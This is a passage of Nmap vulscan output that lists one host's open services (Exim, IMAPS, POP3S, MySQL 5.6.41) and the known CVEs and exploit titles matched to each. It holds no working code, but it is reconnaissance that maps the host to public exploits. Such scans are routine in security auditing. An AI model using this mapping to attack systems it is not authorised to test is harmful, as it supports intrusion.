10054| [13067] Exim HELO or EHLO command heap overflow
10055| [10761] Exim daemon.c format string
10056| [8194] Exim configuration file -c command-line argument buffer overflow
10057| [7738] Exim allows attacker to hide commands in localhost names using pipes
10058| [6671] Exim "
10059| [1893] Exim MTA allows local users to gain root privileges
10060|
10061| Exploit-DB - https://www.exploit-db.com:
10062| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
10063| [15725] Exim 4.63 Remote Root Exploit
10064| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
10065| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
10066| [796] Exim <= 4.42 Local Root Exploit
10067| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
10068|
10069| OpenVAS (Nessus) - http://www.openvas.org:
10070| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
10071|
10072| SecurityTracker - https://www.securitytracker.com:
10073| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
10074| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
10075| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
10076| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
10077| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
10078| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
10079| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
10080| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
10081| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
10082| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
10083| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
10084| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
10085|
10086| OSVDB - http://www.osvdb.org:
10087| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
10088| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
10089| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
10090| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
10091| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
10092| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
10093| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
10094| [70696] Exim log.c open_log() Function Local Privilege Escalation
10095| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
10096| [69685] Exim string_format Function Remote Overflow
10097| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
10098| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
10099| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
10100| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
10101| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
10102| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
10103| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
10104| [12726] Exim -be Command Line Option host_aton Function Local Overflow
10105| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
10106| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
10107| [10032] libXpm CreateXImage Function Integer Overflow
10108| [7160] Exim .forward :include: Option Privilege Escalation
10109| [6479] Vexim COOKIE Authentication Credential Disclosure
10110| [6478] Vexim Multiple Parameter SQL Injection
10111| [5930] Exim Parenthesis File Name Filter Bypass
10112| [5897] Exim header_syntax Function Remote Overflow
10113| [5896] Exim sender_verify Function Remote Overflow
10114| [5530] Exim Localhost Name Arbitrary Command Execution
10115| [5330] Exim Configuration File Variable Overflow
10116| [1855] Exim Batched SMTP Mail Header Format String
10117|_
10118993/tcp open ssl/imaps?
10119995/tcp open ssl/pop3s?
101203306/tcp open mysql MySQL 5.6.41-84.1
10121| vulscan: VulDB - https://vuldb.com:
10122| [125562] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 RBR denial of service
10123| [125559] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Memcached denial of service
10124| [125548] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 Merge denial of service
10125| [125539] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
10126| [125538] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
10127| [125537] Oracle MySQL Server up to 5.6.41/5.7.23/8.0.12 InnoDB denial of service
10128| [138100] Oracle MySQL Server up to 5.6.44/5.7.18 Privileges unknown vulnerability
10129| [138099] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Compiling information disclosure
10130| [138079] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Pluggable Auth denial of service
10131| [138070] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Audit unknown vulnerability
10132| [138067] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 XML denial of service
10133| [138066] Oracle MySQL Server up to 5.6.44/5.7.26/8.0.16 Parser denial of service
10134| [129645] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication denial of service
10135| [129642] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
10136| [129641] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
10137| [129639] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 DDL denial of service
10138| [129630] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Connection Handling denial of service
10139| [129629] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Parser denial of service
10140| [129627] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 PS denial of service
10141| [129626] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Optimizer denial of service
10142| [129624] Oracle MySQL Server up to 5.6.42/5.7.24/8.0.13 Replication unknown vulnerability
10143| [121784] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Memcached denial of service
10144| [121780] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 Installing denial of service
10145| [121774] Oracle MySQL Server up to 5.6.40/5.7.22/8.0.11 InnoDB denial of service
10146|
10147| MITRE CVE - https://cve.mitre.org:
10148| [CVE-2013-3812] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
10149| [CVE-2013-3811] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
10150| [CVE-2013-3810] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
10151| [CVE-2013-3809] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
10152| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
10153| [CVE-2013-3807] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
10154| [CVE-2013-3806] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
10155| [CVE-2013-3805] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
10156| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10157| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
10158| [CVE-2013-3801] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
10159| [CVE-2013-3798] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
10160| [CVE-2013-3796] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10161| [CVE-2013-3795] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10162| [CVE-2013-3794] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
10163| [CVE-2013-3793] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10164| [CVE-2013-2395] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
10165| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
10166| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
10167| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10168| [CVE-2013-2381] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
10169| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
10170| [CVE-2013-2376] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
10171| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
10172| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
10173| [CVE-2013-1570] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
10174| [CVE-2013-1567] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
10175| [CVE-2013-1566] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10176| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
10177| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
10178| [CVE-2013-1523] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
10179| [CVE-2013-1511] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
10180| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
10181| [CVE-2013-1502] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
10182| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
10183|
10184| SecurityFocus - https://www.securityfocus.com/bid/:
10185| [52154] RETIRED: MySQL 5.5.20 Unspecified Remote Code Execution Vulnerability
10186| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
10187| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
10188| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
10189| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
10190| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
10191| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
10192| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
10193| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
10194| [37640] MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability
10195| [36242] MySQL 5.x Unspecified Buffer Overflow Vulnerability
10196|
10197| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10198| [85724] Oracle MySQL Server XA Transactions denial of service
10199| [85723] Oracle MySQL Server Server Replication denial of service
10200| [85722] Oracle MySQL Server InnoDB denial of service
10201| [85721] Oracle MySQL Server Server Privileges unspecified
10202| [85720] Oracle MySQL Server Server Partition denial of service
10203| [85719] Oracle MySQL Server Server Parser denial of service
10204| [85718] Oracle MySQL Server Server Options denial of service
10205| [85717] Oracle MySQL Server Server Options denial of service
10206| [85716] Oracle MySQL Server Server Optimizer denial of service
10207| [85715] Oracle MySQL Server Server Optimizer denial of service
10208| [85714] Oracle MySQL Server Prepared Statements denial of service
10209| [85713] Oracle MySQL Server InnoDB denial of service
10210| [85712] Oracle MySQL Server Full Text Search denial of service
10211| [85711] Oracle MySQL Server Data Manipulation Language denial of service
10212| [85710] Oracle MySQL Server Data Manipulation Language denial of service
10213| [85709] Oracle MySQL Server Audit Log unspecified
10214| [85708] Oracle MySQL Server MemCached unspecified
10215| [84846] Debian mysql-server package information disclosure
10216| [84375] Wireshark MySQL dissector denial of service
10217| [83554] Oracle MySQL Server Server Partition denial of service
10218| [83553] Oracle MySQL Server Server Locking denial of service
10219| [83552] Oracle MySQL Server Server Install unspecified
10220| [83551] Oracle MySQL Server Server Types denial of service
10221| [83550] Oracle MySQL Server Server Privileges unspecified
10222| [83549] Oracle MySQL Server InnoDB denial of service
10223| [83548] Oracle MySQL Server InnoDB denial of service
10224| [83547] Oracle MySQL Server Data Manipulation Language denial of service
10225| [83546] Oracle MySQL Server Stored Procedure denial of service
10226| [83545] Oracle MySQL Server Server Replication denial of service
10227| [83544] Oracle MySQL Server Server Partition denial of service
10228| [83543] Oracle MySQL Server Server Optimizer denial of service
10229| [83542] Oracle MySQL Server InnoDB denial of service
10230| [83541] Oracle MySQL Server Information Schema denial of service
10231| [83540] Oracle MySQL Server Data Manipulation Language denial of service
10232| [83539] Oracle MySQL Server Data Manipulation Language denial of service
10233| [83538] Oracle MySQL Server Server Optimizer unspecified
10234| [83537] Oracle MySQL Server MemCached denial of service
10235| [83536] Oracle MySQL Server Server Privileges unspecified
10236| [83535] Oracle MySQL Server Server Privileges unspecified
10237| [83534] Oracle MySQL Server Server unspecified
10238| [83533] Oracle MySQL Server Information Schema unspecified
10239| [83532] Oracle MySQL Server Server Locking unspecified
10240| [83531] Oracle MySQL Server Data Manipulation Language denial of service
10241| [83388] MySQL administrative login attempt detected
10242| [82963] Mambo MySQL database information disclosure
10243| [82946] Oracle MySQL buffer overflow
10244| [82945] Oracle MySQL buffer overflow
10245| [82895] Oracle MySQL and MariaDB geometry queries denial of service
10246| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
10247| [81325] Oracle MySQL Server Server Privileges denial of service
10248| [81324] Oracle MySQL Server Server Partition denial of service
10249| [81323] Oracle MySQL Server Server Optimizer denial of service
10250| [81322] Oracle MySQL Server Server Optimizer denial of service
10251| [81321] Oracle MySQL Server Server denial of service
10252| [81320] Oracle MySQL Server MyISAM denial of service
10253| [81319] Oracle MySQL Server InnoDB denial of service
10254| [81318] Oracle MySQL Server InnoDB denial of service
10255| [81317] Oracle MySQL Server Server Locking denial of service
10256| [81316] Oracle MySQL Server Server denial of service
10257| [81315] Oracle MySQL Server Server Replication unspecified
10258| [81314] Oracle MySQL Server Server Replication unspecified
10259| [81313] Oracle MySQL Server Stored Procedure denial of service
10260| [81312] Oracle MySQL Server Server Optimizer denial of service
10261| [81311] Oracle MySQL Server Information Schema denial of service
10262| [81310] Oracle MySQL Server GIS Extension denial of service
10263| [80790] Oracle MySQL yaSSL buffer overflow
10264| [80553] Oracle MySQL and MariaDB salt security bypass
10265| [80443] Oracle MySQL Server unspecified code execution
10266| [80442] Oracle MySQL Server acl_get() buffer overflow
10267| [80440] Oracle MySQL Server table buffer overflow
10268| [80435] Oracle MySQL Server database privilege escalation
10269| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
10270| [80433] Oracle MySQL Server Stuxnet privilege escalation
10271| [80432] Oracle MySQL Server authentication information disclosure
10272| [79394] Oracle MySQL Server Server Installation information disclosure
10273| [79393] Oracle MySQL Server Server Replication denial of service
10274| [79392] Oracle MySQL Server Server Full Text Search denial of service
10275| [79391] Oracle MySQL Server Server denial of service
10276| [79390] Oracle MySQL Server Client information disclosure
10277| [79389] Oracle MySQL Server Server Optimizer denial of service
10278| [79388] Oracle MySQL Server Server Optimizer denial of service
10279| [79387] Oracle MySQL Server Server denial of service
10280| [79386] Oracle MySQL Server InnoDB Plugin denial of service
10281| [79385] Oracle MySQL Server InnoDB denial of service
10282| [79384] Oracle MySQL Server Client unspecified
10283| [79383] Oracle MySQL Server Server denial of service
10284| [79382] Oracle MySQL Server Protocol unspecified
10285| [79381] Oracle MySQL Server Information Schema unspecified
10286| [78954] SilverStripe MySQLDatabase.php information disclosure
10287| [78948] MySQL MyISAM table symlink
10288| [77865] MySQL unknown vuln
10289| [77864] MySQL sort order denial of service
10290| [77768] MySQLDumper refresh_dblist.php information disclosure
10291| [77177] MySQL Squid Access Report unspecified cross-site scripting
10292| [77065] Oracle MySQL Server Optimizer denial of service
10293| [77064] Oracle MySQL Server Optimizer denial of service
10294| [77063] Oracle MySQL Server denial of service
10295| [77062] Oracle MySQL InnoDB denial of service
10296| [77061] Oracle MySQL GIS Extension denial of service
10297| [77060] Oracle MySQL Server Optimizer denial of service
10298| [76189] MySQL unspecified error
10299| [76188] MySQL attempts security bypass
10300| [75287] MySQLDumper restore.php information disclosure
10301| [75286] MySQLDumper filemanagement.php directory traversal
10302| [75285] MySQLDumper main.php cross-site request forgery
10303| [75284] MySQLDumper install.php cross-site scripting
10304| [75283] MySQLDumper install.php file include
10305| [75282] MySQLDumper menu.php code execution
10306| [75022] Oracle MySQL Server Server Optimizer denial of service
10307| [75021] Oracle MySQL Server Server Optimizer denial of service
10308| [75020] Oracle MySQL Server Server DML denial of service
10309| [75019] Oracle MySQL Server Partition denial of service
10310| [75018] Oracle MySQL Server MyISAM denial of service
10311| [75017] Oracle MySQL Server Server Optimizer denial of service
10312| [74672] Oracle MySQL Server multiple unspecified
10313| [73092] MySQL unspecified code execution
10314| [72540] Oracle MySQL Server denial of service
10315| [72539] Oracle MySQL Server unspecified
10316| [72538] Oracle MySQL Server denial of service
10317| [72537] Oracle MySQL Server denial of service
10318| [72536] Oracle MySQL Server unspecified
10319| [72535] Oracle MySQL Server denial of service
10320| [72534] Oracle MySQL Server denial of service
10321| [72533] Oracle MySQL Server denial of service
10322| [72532] Oracle MySQL Server denial of service
10323| [72531] Oracle MySQL Server denial of service
10324| [72530] Oracle MySQL Server denial of service
10325| [72529] Oracle MySQL Server denial of service
10326| [72528] Oracle MySQL Server denial of service
10327| [72527] Oracle MySQL Server denial of service
10328| [72526] Oracle MySQL Server denial of service
10329| [72525] Oracle MySQL Server information disclosure
10330| [72524] Oracle MySQL Server denial of service
10331| [72523] Oracle MySQL Server denial of service
10332| [72522] Oracle MySQL Server denial of service
10333| [72521] Oracle MySQL Server denial of service
10334| [72520] Oracle MySQL Server denial of service
10335| [72519] Oracle MySQL Server denial of service
10336| [72518] Oracle MySQL Server unspecified
10337| [72517] Oracle MySQL Server unspecified
10338| [72516] Oracle MySQL Server unspecified
10339| [72515] Oracle MySQL Server denial of service
10340| [72514] Oracle MySQL Server unspecified
10341| [71965] MySQL port denial of service
10342| [70680] DBD::mysqlPP unspecified SQL injection
10343| [70370] TaskFreak! multi-mysql unspecified path disclosure
10344| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
10345| [68294] MySQLDriverCS statement.cs sql injection
10346| [68175] Prosody MySQL denial of service
10347| [67539] Zend Framework MySQL PDO security bypass
10348| [67254] DirectAdmin MySQL information disclosure
10349| [66567] Xoops mysql.sql information disclosure
10350| [65871] PyWebDAV MySQLAuthHandler class SQL injection
10351| [65543] MySQL Select Arbitrary data into a File
10352| [65529] MySQL Eventum full_name field cross-site scripting
10353| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
10354| [65379] Oracle MySQL Eventum list.php cross-site scripting
10355| [65266] Accellion File Transfer Appliance MySQL default password
10356| [64878] MySQL Geometry denial of service
10357| [64877] MySQL EXPLAIN EXTENDED denial of service
10358| [64876] MySQL prepared statement denial of service
10359| [64845] MySQL extreme-value denial of service
10360| [64844] MySQL Gis_line_string::init_from_wkb denial of service
10361| [64843] MySQL user-variable denial of service
10362| [64842] MySQL view preparation denial of service
10363| [64841] MySQL prepared statement denial of service
10364| [64840] MySQL LONGBLOB denial of service
10365| [64839] MySQL invocations denial of service
10366| [64838] MySQL Gis_line_string::init_from_wkb denial of service
10367| [64689] MySQL dict0crea.c denial of service
10368| [64688] MySQL SET column denial of service
10369| [64687] MySQL BINLOG command denial of service
10370| [64686] MySQL InnoDB denial of service
10371| [64685] MySQL HANDLER interface denial of service
10372| [64684] MySQL Item_singlerow_subselect::store denial of service
10373| [64683] MySQL OK packet denial of service
10374| [63518] MySQL Query Browser GUI Tools information disclosure
10375| [63517] MySQL Administrator GUI Tools information disclosure
10376| [62272] MySQL PolyFromWKB() denial of service
10377| [62269] MySQL LIKE predicates denial of service
10378| [62268] MySQL joins denial of service
10379| [62267] MySQL GREATEST() or LEAST() denial of service
10380| [62266] MySQL GROUP_CONCAT() denial of service
10381| [62265] MySQL expression values denial of service
10382| [62264] MySQL temporary table denial of service
10383| [62263] MySQL LEAST() or GREATEST() denial of service
10384| [62262] MySQL replication privilege escalation
10385| [61739] MySQL WITH ROLLUP denial of service
10386| [61343] MySQL LOAD DATA INFILE denial of service
10387| [61342] MySQL EXPLAIN denial of service
10388| [61341] MySQL HANDLER denial of service
10389| [61340] MySQL BINLOG denial of service
10390| [61339] MySQL IN() or CASE denial of service
10391| [61338] MySQL SET denial of service
10392| [61337] MySQL DDL denial of service
10393| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
10394| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
10395| [61316] PHP php_mysqlnd_auth_write buffer overflow
10396| [61274] MySQL TEMPORARY InnoDB denial of service
10397| [59905] MySQL ALTER DATABASE denial of service
10398| [59841] CMySQLite updateUser.php cross-site request forgery
10399| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
10400| [59075] PHP php_mysqlnd_auth_write() buffer overflow
10401| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
10402| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
10403| [59072] PHP php_mysqlnd_ok_read() information disclosure
10404| [58842] MySQL DROP TABLE file deletion
10405| [58676] Template Shares MySQL information disclosure
10406| [58531] MySQL COM_FIELD_LIST buffer overflow
10407| [58530] MySQL packet denial of service
10408| [58529] MySQL COM_FIELD_LIST security bypass
10409| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
10410| [57925] MySQL UNINSTALL PLUGIN security bypass
10411| [57006] Quicksilver Forums mysqldump information disclosure
10412| [56800] Employee Timeclock Software mysqldump information disclosure
10413| [56200] Flex MySQL Connector ActionScript SQL injection
10414| [55877] MySQL yaSSL buffer overflow
10415| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
10416| [55416] MySQL unspecified buffer overflow
10417| [55382] Ublog UblogMySQL.sql information disclosure
10418| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
10419| [54597] MySQL sql_table.cc security bypass
10420| [54596] MySQL mysqld denial of service
10421| [54365] MySQL OpenSSL security bypass
10422| [54364] MySQL MyISAM table symlink
10423| [53950] The mysql-ocaml mysql_real_escape_string weak security
10424| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
10425| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
10426| [52660] iScouter PHP Web Portal MySQL Password Retrieval
10427| [52220] aa33code mysql.inc information disclosure
10428| [52122] MySQL Connector/J unicode SQL injection
10429| [51614] MySQL dispatch_command() denial of service
10430| [51406] MySQL Connector/NET SSL spoofing
10431| [49202] MySQL UDF command execution
10432| [49050] MySQL XPath denial of service
10433| [48919] Cisco Application Networking Manager MySQL default account password
10434| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
10435| [47544] MySQL Calendar index.php SQL injection
10436| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
10437| [45649] MySQL MyISAM symlink security bypass
10438| [45648] MySQL MyISAM symlinks security bypass
10439| [45607] MySQL Quick Admin actions.php file include
10440| [45606] MySQL Quick Admin index.php file include
10441| [45590] MySQL command-line client cross-site scripting
10442| [45436] PromoteWeb MySQL go.php SQL injection
10443| [45042] MySQL empty bit-string literal denial of service
10444| [44662] mysql-lists unspecified cross-site scripting
10445| [42267] MySQL MyISAM security bypass
10446| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
10447| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
10448| [40920] MySQL sql_select.cc denial of service
10449| [40734] MySQL Server BINLOG privilege escalation
10450| [40350] MySQL password information disclosure
10451| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
10452| [39402] PHP LOCAL INFILE and MySQL extension security bypass
10453| [38999] aurora framework db_mysql.lib SQL injection
10454| [38990] MySQL federated engine denial of service
10455| [38989] MySQL DEFINER value privilege escalation
10456| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
10457| [38964] MySQL RENAME TABLE symlink
10458| [38733] ManageEngine EventLog Analyzer MySQL default password
10459| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
10460| [38189] MySQL default root password
10461| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
10462| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
10463| [36555] PHP MySQL extension multiple functions security bypass
10464| [35960] MySQL view privilege escalation
10465| [35959] MySQL CREATE TABLE LIKE information disclosure
10466| [35958] MySQL connection protocol denial of service
10467| [35291] MySQLDumper main.php security bypass
10468| [34811] MySQL udf_init and mysql_create_function command execution
10469| [34809] MySQL mysql_update privilege escalation
10470| [34349] MySQL ALTER information disclosure
10471| [34348] MySQL mysql_change_db privilege escalation
10472| [34347] MySQL RENAME TABLE weak security
10473| [34232] MySQL IF clause denial of service
10474| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
10475| [33285] Eve-Nuke mysql.php file include
10476| [32957] MySQL Commander dbopen.php file include
10477| [32933] cPanel load_language.php and mysqlconfig.php file include
10478| [32911] MySQL filesort function denial of service
10479| [32462] cPanel passwdmysql cross-site scripting
10480| [32288] RHSA-2006:0544 updates for mysql not installed
10481| [32266] MySQLNewsEngine affichearticles.php3 file include
10482| [31244] The Address Book MySQL export.php password information disclosure
10483| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
10484| [30760] BTSaveMySql URL file disclosure
10485| [30191] StoryStream mysql.php and mysqli.php file include
10486| [30085] MySQL MS-DOS device name denial of service
10487| [30031] Agora MysqlfinderAdmin.php file include
10488| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
10489| [29179] paBugs class.mysql.php file include
10490| [29120] ZoomStats MySQL file include
